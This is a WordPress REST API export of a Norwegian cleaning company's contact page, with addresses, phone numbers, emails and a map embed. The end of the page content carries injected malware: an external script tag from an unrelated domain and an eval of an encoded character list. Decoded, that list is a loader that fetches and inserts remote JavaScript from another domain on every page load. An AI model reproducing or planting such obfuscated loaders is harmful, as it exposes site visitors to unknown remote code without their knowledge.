{"id":30,"date":"2019-07-11T06:59:56","date_gmt":"2019-07-11T05:59:56","guid":{"rendered":"http:\/\/ms24.no\/about-us-copy\/"},"modified":"2021-04-13T18:32:30","modified_gmt":"2021-04-13T16:32:30","slug":"kontakt","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=30","title":{"rendered":"Kontakt"},"content":{"rendered":"<h4><em>Vi skreddersyr l\u00f8sninger p\u00e5 renhold som er tilpasset hver enkelt kundes behov og som er tilpasset lokalitetene. Har du sp\u00f8rsm\u00e5l til oss oppfordrer vi deg til \u00e5 benytte skjemaet under.<\/em><\/h4>\n<h6><em>Du er ogs\u00e5 hjertelig velkommen til \u00e5 ringe oss!<\/em><\/h6>\n<p><iframe title=\"tvetenveien 32 0666 oslo\" src=\"https:\/\/maps.google.com\/maps?q=tvetenveien%2032%200666%20oslo&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\" aria-label=\"tvetenveien 32 0666 oslo\"><\/iframe><\/p>\n<h3>Mobil<\/h3>\n<p><a href=\"tel:+47 47 45 88 99 36,\">+47 45 88 99 36,<\/a><br \/>\n<a href=\"tel:+47 47 88 82 42,\">+47 47 88 82 42 ,<\/a><\/p>\n<h3>E-mail:<\/h3>\n<p><a href=\"mailto:hans@ms24.no\">hans@ms24.no<\/a><br \/>\n<a href=\"mail@ms24.no\">mail@ms24.no<\/a><\/p>\n<h3>V\u00e5r serviceavdeling<\/h3>\n<p>Tvetenveien 32,0666 Oslo<br \/>\nS\u00f8ndre torv 2, 3510 H\u00f8nefoss<br \/>\n[NEXForms id=&#8221;4&#8243;]<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vi skreddersyr l\u00f8sninger p\u00e5 renhold som er tilpasset hver enkelt kundes behov og som er tilpasset lokalitetene. Har du sp\u00f8rsm\u00e5l til oss oppfordrer vi deg til \u00e5 benytte skjemaet under. Du er ogs\u00e5 hjertelig velkommen til \u00e5 ringe oss! Mobil +47 45 88 99 36, +47 47 88 82 42 , E-mail: hans@ms24.no mail@ms24.no V\u00e5r [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"footnotes":""},"class_list":["post-30","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/30","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=30"}],"version-history":[{"count":35,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/30\/revisions"}],"predecessor-version":[{"id":5761,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/30\/revisions\/5761"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=30"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}